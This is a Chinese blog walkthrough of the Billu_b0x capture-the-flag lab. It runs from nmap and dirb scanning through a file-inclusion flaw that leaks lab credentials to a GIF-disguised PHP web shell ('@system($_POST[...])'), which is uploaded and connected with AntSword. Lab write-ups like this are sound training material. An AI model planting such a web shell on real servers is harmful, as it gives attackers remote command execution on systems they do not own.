Billu_b0x靶场:一场关于网络安全的技术冒险

1.下载该靶场,并在虚拟机开启,确保网络适配器是NAT网段的

2.借助kali来确定该靶机的IP地址

复制代码
nmap -O 192.168.139.1/24

3.访问该IP地址

4.尝试访问一下robots.txt,什么也没有

5.接下来来到kali里面扫目录

复制代码
dirb http://192.168.139.168

6.首先访问add目录,发现文件上传

7.接下来依次访问目录

8.在192.168.139.168/in下查找发现网站绝对路径

9.使用sqlmap来进行爆破看是否存在注入

10.用sqlmap来扫这个数据包,发现不存在注入

11.文件包含漏洞利用,使用GET传递参数失败,使用POST传参成功

12.访问c.php,发现数据库的账号和密码为billu:b0x_billu

复制代码
mysqli_connect(host,username,password,dbname,port,socket);

13.回到数据库登录页面进行登录

14.查找有用信息发现了用户名和密码

15.然后在首页进行登录账号和密码为biLLu:hEx_it,发现可以进行文件上传

16.上传php文件查看,发现上传失败,只能上传图片文件

上传图片马,上传成功

复制代码
GIF89a
<?php @system($_POST['AAA'])?>

17.进行传参

18.用蚁剑进行连接,就可以连接成功

相关推荐
四月天439 小时前
web安全-SSTI(服务器模板注入)
笔记·学习·web安全·网络安全
独守一片天13 小时前
HarmonyOS 6.1.0 Call Service 来电识别与安全通信怎么设计?
安全·华为·harmonyos
想你依然心痛15 小时前
嵌入式C代码规范:MISRA-C 2012核心规则解读——类型安全与未定义行为深度剖析
c语言·安全·代码规范
Elastic 中国社区官方博客16 小时前
跟踪资金流向:使用 ES|QL 和跨集群搜索追踪洗钱网络
大数据·人工智能·安全·elasticsearch·搜索引擎·金融·全文检索
IT新视界17 小时前
数据要素安全流通服务
安全
微信开发api-视频号协议18 小时前
Codex++安全边界探秘:从模型能力到风险防御
前端·安全·微信·企业微信
枝头玉18 小时前
新160个CrackMe048-monkeycrackme1、049-THraw-crackme8、050-daxxor逆向分析
安全·逆向·crackme·reserve
维基框架18 小时前
Claude Mythos Preview 发布后严重漏洞激增:安全还是营销?
人工智能·安全
技术不好的崎鸣同学19 小时前
[MRCTF2020]PYWebsite 思路及解法
安全·web安全
seven_stars_19 小时前
CVE-2012-1823漏洞复现
安全·靶场·kali